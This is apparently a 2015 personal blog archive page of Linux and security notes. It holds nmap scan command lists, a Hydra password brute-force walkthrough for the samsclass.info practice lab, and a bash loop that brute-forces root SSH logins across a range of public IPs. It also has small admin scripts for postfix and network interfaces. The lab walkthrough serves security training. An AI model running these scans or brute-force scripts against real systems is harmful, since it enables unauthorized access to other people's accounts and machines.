Wednesday, December 30, 2015

NMAP - Top Command Usage

NMAP - Top Command Usage

- nmap 192.168.56.1
- nmap 192.168.56.1-255
- nmap 192.168.56.1 –p 80
- nmap 192.168.56.0/24 –p 1-1000
- nmap 192.168.56.0/24 --exclude 192.168.1.5
- nmap 192.168.56.0/24 --exclude 192.168.1.5,192.168.1.254
- nmap -F 192.168.56.1
- nmap -v -A 192.168.56.1 (operating system and its version)
- nmap -sA 192.168.1.254
- nmap -sA 192.168.1.254  (if a firewall is in place at the target network/IP)
- nmap -PN 192.168.1.1 (In case of firewalls, Nmap has a specific parameter to scan the target)
- nmap --packet-trace 192.168.1.1 (verbosity and see whether all the packets are sent/received)
- nmap –sV 192.168.56.1  (detect different services)

Posted by at No comments:
Labels:

Tuesday, December 29, 2015

Hydra Bruteforce

Hydra Bruteforce

##############################
# 0: Simple Test Case
##############################
hydra -l root -p password attack.samsclass.info http-get /basic0/
URL: http://attack.samsclass.info/basic0

################
# 1: 3-Digit PIN
################
The username is one of these: root, admin, administrator
------------
root@vnkkali:~/Documents# cat usernames1
root
admin
administrator
-------------
create a file makepin3
root@vnkkali:~/Documents# cat makepin3
-------------------
#!/bin/bash

for i in 0 1 2 3 4 5 6 7 8 9
do
for j in 0 1 2 3 4 5 6 7 8 9
do
for k in 0 1 2 3 4 5 6 7 8 9
do
echo $i$j$k >> pin3
done
done
done
-------------------
Run this file to create a file name "pin3"

 hydra -L usernames1 -P pin3 attack.samsclass.info http-get /basic1/
URL: http://attack.samsclass.info/basic1
######################
# 2: Top 50 Passwords
######################
The username is one of these: root, admin, administrator  
downlaod the top 50 passwords and name it top50.txt and attack
hydra -L usernames1 -P top50.txt attack.samsclass.info http-get /basic2/
URL: http://attack.samsclass.info/basic2

#########################################
# 3: Top 50 Passwords + a digit (10 pts.)
#########################################
The username is one of these: root, admin, administrator
hydra -L usernames1 -P top50.txt attack.samsclass.info http-get /basic3/
URL: http://attack.samsclass.info/basic3

#############
# 4: Login Form
#############
The username is one of these: root, admin, administrator

hydra -L usernames1 -x 2:2:a attack.samsclass.info http-get-form "/brute4.php:login=^USER^pw=^PASS^:Deny"

Source: http://attack.samsclass.info/brute.htm 

# Script Brute force SSH
#!/bin/bash
for i in 124.124.124.{167..170}
do 
hydra $i ssh -l root -P top50.txt -s 22 -vV
done

#Hydra #Brutefoce 
Posted by at 1 comment:
Labels:

Monday, December 28, 2015

NMAP - Commands

NMAP - Commands

# One IP
nmap 192.168.56.1

# One Range
nmap 192.168.56.1-255

#Scan IP/Computer 
nmap -sP 192.168.56.0/24

#Check the type of the computer info:
nmap -sS -Pn -A 192.168.56.1

# scan the information of the operating system and its version
nmap -A 192.168.56.1
nmap -v -A 192.168.56.1

# check if a firewall is in place at the target network/IP
nmap -sA 192.168.1.254

# Detect different services running on the remote target
nmap –sV 192.168.56.1

# Specific port
nmap 192.168.56.1 –p 80

# Entire subnet with a specific port range
nmap 192.168.56.0/24 –p 1-1000

# Exclude host, hosts
nmap 192.168.56.0/24 --exclude 192.168.1.5
nmap 192.168.56.0/24 --exclude 192.168.1.5,192.168.1.254

# Speedy
nmap -F 192.168.56.1
Posted by at No comments:
Labels:

Install Khmer Unicode In Kali 2.0

Install Khmer Unicode In Kali 2.0



1. Download NIDA-X11-unicode-keyboard_1.0.2.tar.gz and Khmer Fonts
Download From Here

2. Extract
tar -xvf NIDA-X11-unicode-keyboard_1.0.2.tar.gz
3. Install
cd NIDA-X11-unicode-keyboard_1.0.2
./install
4. Install Fonts
copy font files to /usr/share/fonts/truetype/
and Run this command
fc-cache -f -v

5. Go to Setting and add Khmer keyboard.

Switch keyboad ( Super Key + Space)
Posted by at 2 comments:
Labels:

Sunday, December 27, 2015

Delete Mail Queue

Delete Mail Queue

#!/bin/bash
# Search user, ip or content and delete
if (! test $1)
then
  echo "Usage: $0 IP or username"
  exit 1
fi
for i in 0 1 2 3 4 5 6 7 8 9 A B C D E F
do
echo "Go to directory $i"
cd /var/spool/postfix-deliver/deferred/$i ; grep $1 * | awk '{print $3}'| postsuper -c /etc/postfix-deliver/ -d-
done
Posted by at No comments:
Labels:

Tuesday, December 1, 2015

Script Get All IPs on Eth

Script Get All IPs on Eth

#!/bin/bash
ETH=$(ip add |grep eth |cut -d: -f2 |awk '{print $1}' |grep eth)

for i in $ETH; do echo "IP on $i: "; ifconfig $i | grep inet | awk '{print $2}' |cut -d: -f2 ;done



Posted by at No comments:
Labels: